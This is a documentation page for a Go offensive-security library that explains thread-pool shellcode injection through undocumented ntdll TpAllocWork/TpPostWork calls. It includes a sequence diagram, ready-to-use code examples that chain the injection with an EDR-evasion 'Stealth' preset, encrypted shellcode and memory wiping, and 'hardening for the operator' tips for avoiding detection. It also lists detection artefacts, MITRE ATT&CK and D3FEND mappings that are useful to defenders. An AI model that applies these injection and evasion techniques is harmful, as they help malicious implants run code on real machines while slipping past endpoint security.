Thread pool injection
← injection index · docs/index
New to maldev injection? Read the injection/README.md vocabulary callout first.
TL;DR
Drop a work item onto the process's default thread pool via the
undocumented TpAllocWork / TpPostWork / TpReleaseWork triplet in
ntdll. An idle worker thread that already exists picks the item up
and runs the shellcode as a normal callback. No CreateThread, no
NtCreateThreadEx, no APC. Local-only.
| Trait | Value |
|---|---|
| Target class | Local (current process) |
| Creates a new thread? | No — reuses one of the always-running pool workers |
Uses WriteProcessMemory? | No — caller pre-allocates RX in their own process |
| Stealth tier | High — no CreateThread / QueueAPC / SetContext call enters EDR's view |
| CET-affected? | Pool dispatcher may enforce ENDBR64 on Win11 24H2+. Use inject.ThreadPoolExecCET for auto-wrapping. |
When to pick a different method:
- Want callback-via-existing-API rather than work-queue? → Callback execution.
- Need Self but want explicit thread (not pool)? → EtwpCreateEtwThread.
- Need to inject into a different process? → ThreadPool is Local-only. See CreateRemoteThread / Section Mapping.
Primer
Every Windows process has a default thread pool — a small ring of
worker threads created by RtlpInitializeThreadPool early in process
startup. The pool's purpose is to dispatch arbitrary work items
submitted by kernel32!QueueUserWorkItem, ntdll!TpPostWork, and the
modern CreateThreadpoolWork family. The implant abuses the
ntdll-private layer: TpAllocWork(callback, ctx, env) builds a
TP_WORK object whose callback pointer is the shellcode, TpPostWork
pushes it onto the queue, and one of the existing workers dequeues
and dispatches it.
The result is execution on a thread that the implant did not create
and the EDR did not see being created. The same TP_WORK object is
the textbook plumbing every well-behaved Windows process uses dozens of
times per second; the only anomaly is the callback target itself.
How it works
sequenceDiagram
participant Impl as "Implant"
participant Nt as "ntdll"
participant Pool as "Default thread pool"
participant W as "Worker thread"
Impl->>Impl: VirtualAlloc(RW) + memcpy
Impl->>Impl: VirtualProtect(RX)
Impl->>Nt: TpAllocWork(&work, sc, 0, 0)
Nt-->>Impl: TP_WORK*
Impl->>Nt: TpPostWork(work)
Nt->>Pool: enqueue
Pool->>W: dispatch
W->>W: shellcode runs as callback
Impl->>Nt: TpWaitForWork(work, false)
Note over Impl: blocks until callback returns
Impl->>Nt: TpReleaseWork(work)
Steps:
- Allocate / write / protect in the current process — RW first, then RX.
TpAllocWork— register the shellcode as the callback.TpPostWork— submit the work item.- Worker dispatch — an existing pool worker dequeues and calls the callback (the shellcode).
TpWaitForWork— block to guarantee completion beforeTpReleaseWorkfrees the object underneath the running callback.TpReleaseWork— clean up.
API → godoc
pkg.go.dev/github.com/oioio-space/maldev/inject is the authoritative
reference for every exported symbol. This page teaches the
concepts; the godoc is the specification.
Examples
Simple
import "github.com/oioio-space/maldev/inject"
if err := inject.ThreadPoolExec(shellcode); err != nil {
return err
}
Simple — future-proofed (CET-aware)
// Same code, no per-call decisions. Wraps with cet.Wrap when
// cet.Enforced() flips true on a future Win build; no-op today.
if err := inject.ThreadPoolExecCET(shellcode); err != nil {
return err
}
Composed (ModuleStomp + manual TpAllocWork)
ThreadPoolExec is a one-shot helper. To make the callback target
image-backed, stomp first and call TpAllocWork manually — see
inject/threadpool_windows.go
for the call shape:
import "github.com/oioio-space/maldev/inject"
addr, err := inject.ModuleStomp("msftedit.dll", shellcode)
if err != nil { return err }
// dispatch via TpAllocWork(addr, ...) — see source for full snippet
return inject.ExecuteCallback(addr, inject.CallbackRtlRegisterWait)
Advanced (chain with evasion preset)
import (
"github.com/oioio-space/maldev/evasion"
"github.com/oioio-space/maldev/evasion/preset"
"github.com/oioio-space/maldev/inject"
)
_ = evasion.ApplyAll(preset.Stealth(), nil)
return inject.ThreadPoolExec(shellcode)
Complex (decrypt + thread-pool + wipe)
import (
"github.com/oioio-space/maldev/cleanup/memory"
"github.com/oioio-space/maldev/crypto"
"github.com/oioio-space/maldev/evasion"
"github.com/oioio-space/maldev/evasion/preset"
"github.com/oioio-space/maldev/inject"
)
_ = evasion.ApplyAll(preset.Stealth(), nil)
shellcode, err := crypto.DecryptAESGCM(aesKey, encrypted)
if err != nil { return err }
memory.SecureZero(aesKey)
if err := inject.ThreadPoolExec(shellcode); err != nil { return err }
memory.SecureZero(shellcode)
OPSEC & Detection
| Artefact | Where defenders look |
|---|---|
TP_WORK callback pointer outside any image | EDR memory scanners walk active pool work items (CrowdStrike Falcon Sensor, MDE Live Response) |
| RW → RX flip in current process | NtProtectVirtualMemory telemetry — every modern EDR keys on the protection transition |
| Pool worker stack containing addresses outside any module | Stack-walking telemetry on the thread-pool dispatcher |
D3FEND counters:
- D3-PCSV — verifies the callback against image segments.
- D3-EAL — WDAC blocks RX flips outside images.
Hardening for the operator: pair with ModuleStomp
so the callback pointer is image-backed; spread allocations across
multiple smaller pages to reduce signature surface; sleep-mask the
shellcode region between activations
(evasion/sleepmask).
MITRE ATT&CK
| T-ID | Name | Sub-coverage | D3FEND counter |
|---|---|---|---|
| T1055.001 | Process Injection: DLL Injection | thread-pool variant — no thread creation | D3-PCSV |
Limitations
- Local only. Targets the current process's pool. There is no
cross-process variant — the
TP_WORKobject lives in the calling process. - Synchronous via
TpWaitForWork. The helper blocks until the callback returns. Long-running shellcode should detach internally (spawn a fiber or thread). - CET dispatcher is not currently enforced on the thread-pool
path (unlike
RtlRegisterWait, which is). PlainThreadPoolExecworks as-is. The future-proofThreadPoolExecCETwrapper auto-prependsENDBR64viacet.Wrapwhencet.Enforced()returns true, so an implant built against this helper survives the day Microsoft flips the dispatcher to ENDBR64-required. Cost on non-enforced hosts: 4 bytes of shellcode prefix. - Region not freed. The RX page persists until process exit unless
the implant calls
cleanup/memory.WipeAndFree. - Undocumented APIs.
TpAllocWork/TpPostWork/TpReleaseWorkare not in the SDK; future Windows builds may rename or relocate them.
See also
- Callback execution — the broader family; thread pool is the worker-thread variant.
- Module Stomping — pair to make the callback pointer image-backed.
evasion/sleepmask— mask the RX region between dispatches.- Modexp, Calling Conventions in Windows
— original public write-up of
TpAllocWork-based injection.